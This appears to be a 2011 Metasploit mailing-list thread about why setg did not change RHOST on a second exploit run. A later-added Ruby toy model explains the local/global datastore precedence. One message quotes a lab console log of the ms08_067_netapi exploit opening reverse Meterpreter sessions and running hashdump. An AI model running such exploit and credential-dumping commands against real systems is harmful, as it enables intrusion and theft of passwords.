Metasploit mailing list archives

Re: [RHOST] bug ?


From: Joshua Smith <lazydj98 () gmail com>
Date: Thu, 20 Oct 2011 13:29:16 -0400

Yeah, I'd have to examine the source, but I believe it's something
like (in pseudo code)

ldatastore['RHOST'] || gdatastore['RHOST']

So the global datastore is more like the default. However, if there's no
local, the local becomes the value of the global, so when you do the
next setg you're changing the default; however, there's a local defined
now, cuz you're using the exact same module and therefore the module
instance hasn't changed, which would otherwise wipe out the local
datastore.

So I think if you changed to a different module, the setg would be all
you needed, but staying in that module you've created a local.

I'm not a dev tho, I'm just an avid user ;)

-Josh

On Thu, Oct 20, 2011 at 12:17 PM, cons0ul <sachinshinde11 () gmail com> wrote:
Yeah, silly me.

It happens here:

msf  exploit(ms08_067_netapi) > setg RHOST 192.168.1.61
RHOST => 192.168.1.61

It's interesting that RHOST is both a global and a local variable... is this
variable overriding?


thanks,
cons0ul


On Thu, Oct 20, 2011 at 6:37 PM, Joshua Smith <lazydj98 () gmail com> wrote:
No, just use set the second time instead of setg. The global datastore is used if there's nothing in the local 
store, which is the case in your scenario.

-Josh

On Oct 20, 2011, at 4:16 AM, cons0ul <sachinshinde11 () gmail com> wrote:

msf  exploit(ms08_067_netapi) > version
Framework: 4.1.0-release.13988
Console  : 4.1.0-release.13581

:)

On Thu, Oct 20, 2011 at 1:43 PM, cons0ul <sachinshinde11 () gmail com> wrote:
Hi,

I was just testing SMB exploits in our testing lab, and this is what I did:


msf  exploit(ms08_067_netapi) > setg RHOST 192.168.1.61
RHOST => 192.168.1.61
msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.7:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.61
[*] Meterpreter session 1 opened (192.168.1.7:4444 ->
192.168.1.61:1977) at 2011-10-20 13:32:46 +0530

meterpreter > hashdump
meterpreter > background
msf  exploit(ms08_067_netapi) > setg RHOST 192.168.1.62
RHOST => 192.168.1.62
msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.7:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.61
[*] Meterpreter session 2 opened (192.168.1.7:4444 ->
192.168.1.61:1978) at 2011-10-20 13:33:56 +0530


Is it a bug?

thanks,
cons0ul

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

-- 
- Josh
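The lookup order Josh describes above, replayed as a small toy model. This is an added illustration, not Metasploit's own Msf::DataStore / Msf::ModuleDataStore code and not part of the original thread. GlobalStore stands for what setg writes, ModuleStore for what set writes, and ModuleStore#get is the thread's ldatastore['RHOST'] || gdatastore['RHOST']. The copy-into-local step in ModuleStore#run models Josh's hypothesis about why the second setg did not take effect; the thread never confirms that against the framework source, so treat that step as an assumption. The source method is the practical check: it tells you whether the value a module will use comes from its local store or the global one before you run anything.

```ruby
# Toy model of a two-level datastore (global vs. module-local), written to
# illustrate the precedence discussed in the thread. NOT Metasploit's real
# Msf::DataStore / Msf::ModuleDataStore implementation.

# Global store: what `setg` writes to. Shared by every module instance.
class GlobalStore
  def initialize
    @vals = {}
  end

  def set(key, value)
    @vals[key.upcase] = value
  end

  def get(key)
    @vals[key.upcase]
  end
end

# Per-module-instance store: what `set` writes to. A read falls back to the
# global store when the key is missing locally, i.e. the pseudo code from
# the thread:  ldatastore['RHOST'] || gdatastore['RHOST']
class ModuleStore
  def initialize(global)
    @global = global
    @local = {}
  end

  def set(key, value)
    @local[key.upcase] = value
  end

  def unset(key)
    @local.delete(key.upcase)
  end

  def get(key)
    @local[key.upcase] || @global.get(key)
  end

  # Which store supplies the value? Worth checking before running a module.
  def source(key)
    k = key.upcase
    return :local if @local.key?(k)
    return :global unless @global.get(k).nil?
    :unset
  end

  # ASSUMPTION (Josh's hypothesis, not verified against the framework source):
  # running the module resolves each option it needs and the resolved value
  # lands in the local store, so later `setg` calls no longer reach this
  # module instance.
  def run(*needed_keys)
    needed_keys.each do |k|
      value = get(k)
      set(k, value) unless @local.key?(k.upcase) || value.nil?
    end
    needed_keys.map { |k| [k.upcase, get(k)] }.to_h
  end
end

# Replays the thread's scenario (addresses are the constructed lab values
# quoted in the thread) and returns what each step observed.
def replay_thread_scenario
  global = GlobalStore.new
  mod    = ModuleStore.new(global)          # one module instance, reused

  global.set('RHOST', '192.168.1.61')       # setg RHOST 192.168.1.61
  source_before_run = mod.source('RHOST')   # :global, nothing local yet
  first  = mod.run('RHOST')['RHOST']        # exploit -> 192.168.1.61

  global.set('RHOST', '192.168.1.62')       # setg RHOST 192.168.1.62
  second = mod.run('RHOST')['RHOST']        # exploit -> still 192.168.1.61
  source_after_run = mod.source('RHOST')    # :local now shadows the global

  mod.set('RHOST', '192.168.1.62')          # set RHOST 192.168.1.62 (Josh's fix)
  third = mod.run('RHOST')['RHOST']         # exploit -> 192.168.1.62

  mod.unset('RHOST')                        # unset RHOST: fall back to global
  after_unset = mod.get('RHOST')            # 192.168.1.62 from the global store

  fresh  = ModuleStore.new(global)          # a new module instance, empty local
  fourth = fresh.run('RHOST')['RHOST']      # global wins -> 192.168.1.62

  { first: first, second: second, third: third, after_unset: after_unset,
    fresh_instance: fourth,
    source_before_run: source_before_run, source_after_run: source_after_run }
end

if __FILE__ == $PROGRAM_NAME
  replay_thread_scenario.each { |k, v| puts "#{k}: #{v}" }
end
```

Run it with `ruby datastore_model.rb` (any file name works). The second run keeping 192.168.1.61 is exactly the behaviour cons0ul reported; a plain `set`, an `unset`, or a fresh module instance all make the newer global value visible again.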